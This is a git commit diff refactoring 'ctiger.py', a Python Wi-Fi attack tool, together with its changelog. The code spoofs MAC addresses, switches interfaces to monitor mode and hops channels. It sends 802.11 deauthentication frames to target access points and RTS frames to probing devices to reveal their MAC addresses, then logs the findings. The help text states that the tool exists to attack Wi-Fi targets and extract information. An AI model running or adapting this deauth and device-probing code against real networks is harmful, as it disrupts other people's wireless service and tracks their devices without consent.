refactor: ♻️ Massive refactoring

Refactored handling of variables, and Garbage Collection
This commit is contained in:
anoduck 2024-01-27 13:20:17 -05:00
parent b6bbd48a25
commit a76b04fa2a
2 changed files with 125 additions and 99 deletions

View file

@ -10,6 +10,25 @@
# ---------------------------------------
* Changelog
** Unreleased
*** 2024.01.27
- Garbage collection for class definitions
- massive refactoring of how variables are passed.
- fixed chan_hop argument error
- fixed signal_handler undefined log error
** 0.4.1
*** 2024.01.26
- Fixing interface name resolution error in @__init__@.
- removed useless references to "self.variable = variable"
- Removed pointless use of threading for solitary processing
- Corrected or removed context managers for threading.
- Removed unneeded "**kwargs" for function definitions.
- corrected log file path
- renamed chan_hop to do_hop
- fixed mon_dev startup for attack
- Repairing mon_if functions
*** 2024.01.25
- added context managers to threads (later removed)
** 0.4.0
*** 2024.01.23
- Dropped Asynchronous processing, as it was pointless
- Moved Attack action into it's own class.

205
ctiger.py
View file

@ -115,55 +115,50 @@ def extract_channel(layers):
# ██║ ╚████║███████╗ ██║ ██████╔╝███████╗ ╚████╔╝
# ╚═╝ ╚═══╝╚══════╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═══╝
# ----------------------------------------------------------------
class NetDev:
def __init__(self, interface, mon_type) -> None:
self.interface = interface
self.mon_type = mon_type
self.macaddr = fake.mac_address()
self.mon_crtd = f'{interface}mon'
class NetDev(object):
def create_if(self) -> bool:
try:
os.system(f'ip link set {self.interface} up')
os.system(
f'iw dev {self.interface} interface add {self.mon_crtd} type monitor')
log.debug('Created {0}'.format(self.mon_crtd))
self.log.debug('Created {0}'.format(self.mon_crtd))
os.system(f'ip link set {self.mon_crtd} down')
os.system(f'ip link set {self.mon_crtd} address {self.macaddr}')
log.debug('Set device address to {0}'.format(self.macaddr))
self.log.debug('Set device address to {0}'.format(self.macaddr))
os.system(f'ip link set {self.mon_crtd} up')
log.debug('Set device up')
self.log.debug('Set device up')
os.system('iw set reg US')
log.debug('Set device registry to US')
log.info('Device is fully configured and up')
self.log.debug('Set device registry to US')
self.log.info('Device is fully configured and up')
return True
except os.error as e:
log.debug('Failed to create {0}'.format(self.interface), e)
self.log.debug('Failed to create {0}'.format(self.interface), e)
sys.exit(1)
def switch_if(self) -> bool:
try:
os.system(f'ip link set {self.interface} down')
log.debug('Set device down')
self.log.debug('Set device down')
os.system(f'ip link set {self.interface} address {self.macaddr}')
log.debug('Set device address to {0}'.format(self.macaddr))
self.log.debug('Set device address to {0}'.format(self.macaddr))
# (below) setting registry is known to cause issues.
# os.system('iw set reg US')
# log.debug('Set device registry to US')
# self.log.debug('Set device registry to US')
os.system(f'iw dev {self.interface} set type monitor')
log.debug('{0} switched to monitor'.format(self.interface))
self.log.debug('{0} switched to monitor'.format(self.interface))
os.system(f'ip link set {self.interface} up')
scapyconfig.iface = self.interface
log.info('Set scapy config self.name to: {0}'.format(
self.log.info('Set scapy config self.name to: {0}'.format(
self.interface))
log.info('Device is fully configured and up')
self.log.info('Device is fully configured and up')
return True
except os.error as e:
log.debug('Failed to switch ', self.interface, ' type', e)
self.log.debug('Failed to switch ', self.interface, ' type', e)
print('Failed to change ', self.interface, ' mode', e)
sys.exit(1)
def start_monitor(self) -> str:
def start_monitor(self, interface, mon_type, log) -> tuple:
"""
Starts a monitor self.name based on the given arguments.
@ -178,17 +173,22 @@ class NetDev:
str: The name of the created or switched monitor interface.
"""
self.interface = interface
self.mon_type = mon_type
self.log = log
self.macaddr = fake.mac_address()
self.mon_crtd = f'{self.interface}mon'
log.debug('mac_address: {0}'.format(self.macaddr))
log.debug('Monitor Type: {0}'.format(self.mon_type))
log.info('Starting monitor interface')
if self.mon_type == 'create':
self.create_if()
mon_if = self.mon_crtd
return mon_if
return mon_if, self.macaddr
elif self.mon_type == 'switch':
self.switch_if()
mon_if = self.interface
return mon_if
return mon_if, self.macaddr
else:
Exception('Invalid monitor type')
log.debug('Invalid monitor type')
@ -203,61 +203,57 @@ class NetDev:
# ██║ ╚██████╔╝██║ ██║╚██████╔╝███████╗
# ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══════╝
# ---------------------------------------------------------
@dataclass
class Purge(object):
def __init__(self, **kwargs) -> None:
self.interface = kwargs.get('interface')
self.mon_type = kwargs.get('mon_type')
self.valid_file = kwargs.get('valid_file')
self.channels = kwargs.get('channels')
def __getitem__(self, pkt):
return pkt
def do_hop(self, mon_if, chans, log) -> None:
def do_hop(self) -> None:
self.log.debug('Hop args: {0}'.format(self.do_hop.__code__.co_varnames))
thread = threading.current_thread()
log.debug(f'Do Hop: name={thread.name}, daemon={thread.daemon}')
self.log.debug(f'Do Hop: name={thread.name}, daemon={thread.daemon}')
while True:
ichan = choice(chans)
log.debug('Hopping on: {0}'.format(ichan))
ichan = choice(self.chans)
self.log.debug('Hopping on: {0}'.format(ichan))
os.system(f'iw dev {self.mon_if} set channel {str(ichan)}')
log.debug('Channel set to {0}'.format(ichan))
self.log.debug('Channel set to {0}'.format(ichan))
sleep(14.7)
def channel_runner(self, log) -> None:
mon_if = self.mon_if
log.info('Channel Runner NG started.')
log.info('Preliminary channel list: {0}'.format(self.channels))
chanlist = self.channels.split(',')
chlist = list(set(chanlist))
chans = [int(chan) for chan in chlist]
self.chans = chans
log.info('Channel list: {0}'.format(chlist))
thread = threading.current_thread()
log.debug(
f'Channel Runner: name={thread.name}, daemon={thread.daemon}')
chop = threading.Thread(target=self.do_hop,
name='chop',
args=(mon_if, chans, log))
name='chop')
chop.start()
def send_pkt(self, bssid) -> None:
log.debug('Extracted bssid: {0}'.format(bssid))
self.log.debug('Extracted bssid: {0}'.format(bssid))
durid = 65535
log.debug('Selected durid: {0}'.format(durid))
log.debug('Sending packet with: {0}'.format(macaddr))
self.log.debug('Selected durid: {0}'.format(durid))
self.log.debug('Sending packet with: {0}'.format(self.macaddr))
new_pkt = RadioTap()/Dot11(proto=0, type=1, subtype=11,
addr1=bssid,
addr2=macaddr,
addr2=self.macaddr,
ID=durid)
log.debug(
self.log.debug(
'Sending RTS frame to {0} with type 1 and subtype 11'.format(bssid))
sendp(new_pkt, verbose=0)
return
def get_interface(self) -> str:
ndev = NetDev(interface=self.interface, mon_type=self.mon_type)
mon_if = ndev.start_monitor()
return mon_if
def get_interface(self) -> tuple:
ndev = NetDev()
if_tup = ndev.start_monitor(interface=self.interface,
mon_type=self.mon_type,
log=self.log)
return if_tup
def extract_channel(self, layers):
retval = ''
@ -278,30 +274,37 @@ class Purge(object):
def cts_prn(self, pkt):
bssid = pkt[Dot11FCS].addr2
log.info('Intercepted CTS from {0}'.format(bssid))
self.log.info('Intercepted CTS from {0}'.format(bssid))
dbm_signal = pkt.dBm_AntSignal
pkt_chan = self.extract_channel(pkt[Dot11])
log.debug('Extracted channel: {0}'.format(pkt_chan))
scan_df.loc[bssid] = [macaddr, dbm_signal,
self.log.debug('Extracted channel: {0}'.format(pkt_chan))
scan_df.loc[bssid] = [self.macaddr, dbm_signal,
pkt_chan, 'N/A']
scan_df.to_csv(self.valid_file, mode='a')
log.info('Results written to {0}'.format(valid_file))
self.log.info('Results written to {0}'.format(valid_file))
def probe_prn(self, pkt):
bssid = pkt[Dot11FCS].addr2
log.info('Intercepted probe-req from {0}'.format(bssid))
log.debug('Extracted bssid: {0}'.format(bssid))
log.info('Sending RTS frame to {0}'.format(bssid))
self.log.info('Intercepted probe-req from {0}'.format(bssid))
self.log.debug('Extracted bssid: {0}'.format(bssid))
self.log.info('Sending RTS frame to {0}'.format(bssid))
self.send_pkt(bssid)
return
def mac_revealer(self, interface, mon_type, valid_file, channels):
def mac_revealer(self, interface, mon_type, valid_file, channels, log):
self.interface = interface
self.mon_type = mon_type
self.valid_file = valid_file
self.channels = channels
self.log = log
log.info('mac revealer started')
log.info('setting up class attributes')
global scan_df
scan_df = get_df()
log.info('acquired Dataframe')
mon_if = self.get_interface()
mon_if, macaddr = self.get_interface()
self.mon_if = mon_if
self.macaddr = macaddr
log.debug('mon_if: {0}'.format(mon_if))
log.debug('return type: {0}'.format(type(mon_if)))
log.info('interface {0} is up and running.'.format(self.mon_if))
@ -320,14 +323,15 @@ class Purge(object):
log.info('CTS sniffer started')
def start_purge(interface, mon_type, valid_file, channels) -> None:
def start_purge(interface, mon_type, valid_file, channels, log) -> None:
signal.signal(signal.SIGINT, signal_handler)
print('Enter Ctrl+C TWICE to fully stop the script.')
purge = Purge()
purge.mac_revealer(interface=interface,
mon_type=mon_type,
valid_file=valid_file,
channels=channels)
channels=channels,
log=log)
forever_wait = threading.Event()
forever_wait.wait()
@ -342,11 +346,6 @@ def start_purge(interface, mon_type, valid_file, channels) -> None:
# -------------------------------------------------------------
class attack:
def __init__(self, mon_dev, scan_file, log):
self.mon_dev = mon_dev
self.scan_file = scan_file
log = log
def sniff_stop(self, pkt):
global hndshk_frag
hndshk_frag = 0
@ -368,29 +367,29 @@ class attack:
with lock:
fg_asf = AsyncSniffer(stop_filter=self.sniff_stop,
iface=mon_dev, monitor=True)
log.info('Starting pkt gather')
self.log.info('Starting pkt gather')
fg_asf.start()
# log.info('Setting mon_dev channel to ', channel)
pkt = RadioTap()/Dot11(type=0, subtype=4,
addr1="ff:ff:ff:ff:ff:ff",
addr2=targ, addr3=targ)/Dot11Deauth()
log.debug('sending deauth to ', targ, ' with type 4')
self.log.debug('sending deauth to ', targ, ' with type 4')
sendp(pkt, iface=mon_dev, verbose=0)
pkt = RadioTap()/Dot11(type=0, subtype=12,
addr1="ff:ff:ff:ff:ff:ff", addr2=targ,
addr3=targ)/Dot11Deauth()
log.debug('sending deauth to ', targ, ' with type 12')
self.log.debug('sending deauth to ', targ, ' with type 12')
sendp(pkt, iface=mon_dev, verbose=0)
def grab_macs(self, pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 4:
if pkt.info != '':
log.debug('mac: ', pkt.addr2)
self.log.debug('mac: ', pkt.addr2)
return pkt.addr2
def chan_hopper(self, mon_dev, channels, lock):
log.info('Channel hopper started.')
self.log.info('Channel hopper started.')
chlist = list(set(channels))
chlist.sort()
chlist.remove(',')
@ -400,14 +399,17 @@ class attack:
ichan = choice(chans)
iw_cmd = 'iw dev ' + mon_dev + ' set channel ' + str(ichan)
os.system(iw_cmd)
log.debug('Channel set to ', str(ichan))
self.log.debug('Channel set to ', str(ichan))
sleep(14.7)
# return ichan
def attack(self, mon_dev, scan_file):
def attack(self, mondev, scan_file, log):
self.log = log
self.mon_dev = mondev
self.scan_file = scan_file
log.info('Beginning Attack')
get_df()
targets = pd.read_csv(scan_file, index_col=0)
targets = pd.read_csv(self.scan_file, index_col=0)
tpairs = targets.drop(columns=['crypt', 'ssid'])
pd_chan_list = tpairs.channel.to_list()
channels = list(set(pd_chan_list))
@ -416,7 +418,7 @@ class attack:
bssids = list(set(pd_bssid_list))
log.info('Channel list: ', str(channels))
log.info('BSSID list: ', str(bssids))
asniff = AsyncSniffer(iface=mon_dev,
asniff = AsyncSniffer(iface=self.mon_dev,
prn=self.grab_macs,
monitor=True, store=False)
asniff.start()
@ -425,24 +427,24 @@ class attack:
while True:
ch_thread = threading.Thread(target=self.chan_hopper,
name='chopper',
args=(mon_dev, channels, lock))
args=(self.mon_dev, channels, lock))
ch_thread.start()
if asniff.results is not None:
with asniff.results() as ares:
for row in ares:
if row[1] in targets:
log.info('Found target: ', row[1])
fg_thread = threading.Thread(
target=self.feed_gather,
name='feeder',
args=(mon_dev, row, lock))
fg_thread.start()
ares = asniff.results
if ares is not None:
for row in ares:
if row[1] in targets:
log.info('Found target: ', row[1])
fg_thread = threading.Thread(
target=self.feed_gather,
name='feeder',
args=(self.mon_dev, row, lock))
fg_thread.start()
def start_attack(mondev, scan_file, log):
log.info('Starting the attack')
att = attack(mondev, scan_file, log)
att.attack(mondev, scan_file)
att = attack()
att.attack(mondev, scan_file, log)
# ---------------------------------------------------------------------------
@ -454,9 +456,9 @@ def start_attack(mondev, scan_file, log):
# ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
# ----------------------------------------------------------------------------
# This shit does not work.
def proc_attack(interface, scan_file, mon_type):
ndev = NetDev(interface, mon_type)
mon_dev = ndev.start_monitor()
def proc_attack(interface, scan_file, mon_type, log):
ndev = NetDev()
mon_dev = ndev.start_monitor(interface, mon_type, log)
mp.set_start_method('spawn')
attack_daemon = mp.Process(target=start_attack, args=(mon_dev, scan_file),
name='attack_daemon', daemon=True)
@ -467,7 +469,7 @@ def proc_attack(interface, scan_file, mon_type):
attack_daemon.join()
else:
log.info('Running in foreground...')
start_attack(mon_dev, scan_file)
start_attack(mon_dev, scan_file, log)
# -------------------------------------------------------------
@ -494,8 +496,6 @@ def get_df():
def signal_handler(signal=signal.SIGINT, frame=None) -> None:
print('You pressed Ctrl+C!')
log.info('Shutting down')
log.info('Going Down!!')
exit(0)
@ -550,14 +550,13 @@ def process_args(args: argparse.Namespace) -> None:
Returns:
None
"""
global log
log = get_log(args.log_file, args.log_level)
log.info('Started crouching tiger')
log.info('Started logger...')
match args.module:
case "att":
log.info('Starting attack formation...')
proc_attack(args.interface, args.scan_file, args.mon_type)
proc_attack(args.interface, args.scan_file, args.mon_type, log)
case "mac":
log.info('Beginning Mac Purge')
#mon_dev, mon_type, valid_file, channels
@ -568,7 +567,8 @@ def process_args(args: argparse.Namespace) -> None:
start_purge(interface=args.name,
mon_type=args.mon_type,
valid_file=args.valid_file,
channels=args.channels)
channels=args.channels,
log=log)
case _:
ap.print_help()
@ -626,6 +626,11 @@ if not os.path.isfile(config_file):
sys.exit()
else:
config = ConfigObj(config_file, configspec=spec)
validator = validate.Validator()
test = config.validate(validator, preserve_errors=True)
if not test:
print("Configuration file is invalid")
sys.exit()
##################
# ArgParse Setup #
@ -633,12 +638,11 @@ else:
ap = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
conflict_handler='resolve',
usage='%(prog)s -i $IFACE (-t $TARGET or -f $TARGET_FILE) {mac,att,scn}',
epilog='Processing will take several seconds, please be patient.\n',
usage='%(prog)s -i $IFACE (-t $TARGET or -f $TARGET_FILE)\n',
description='Performs various actions on wifi targets.\n'
'\n'
'This program was created with the intent to allow users to attack\n'
'wifi targetsthat are only available some of the time, and extract\n'
'wifi targets that are only available some of the time, and extract\n'
'information from them.\n'
'\n'
'There are three types of actions that can be performed:\n'
@ -647,7 +651,8 @@ else:
' If found will begin capturing a pcap file and deauth attack.\n'
'\n'
'3. Mac_Purge [mac] = Experimental: Scans for wireless devices and acquires their MAC\n' ' addresses. Then transmits a Clear to Send Frame. If the device responds with \n'
' data frame, then information on the device will be stored and written to file.\n')
' data frame, then information on the device will be stored and written to file.\n'
'\n')
# options parser
ap.add_argument('-v', '--version', action='version',
version=f'%(prog)s {VERSION}')
@ -662,7 +667,8 @@ else:
help='Log file')
# Subparser
subparse = ap.add_subparsers(title='actions', description='Action to perform',
subparse = ap.add_subparsers(title='actions',
description='Use "ctiger.py $(action) --help" for more info',
required=True, dest='module',
help='You must use one.')
@ -681,8 +687,9 @@ else:
att_parse.set_defaults(fun=attack)
mac_parse = subparse.add_parser('mac', help='Grab Valid addresses')
mac_parse.add_argument('-t', '--type', dest='mon_type', choices=['create',
'switch'], default=config['MAC_PURGE']['if_type'],
mac_parse.add_argument('-t', '--type', dest='mon_type',
choices=['create', 'switch'],
default=config['MAC_PURGE']['if_type'],
help='Create new monitor inf or switch mode.')
mac_parse.add_argument('-f', '--file', dest='valid_file',
default=config['MAC_PURGE']['valid_results'],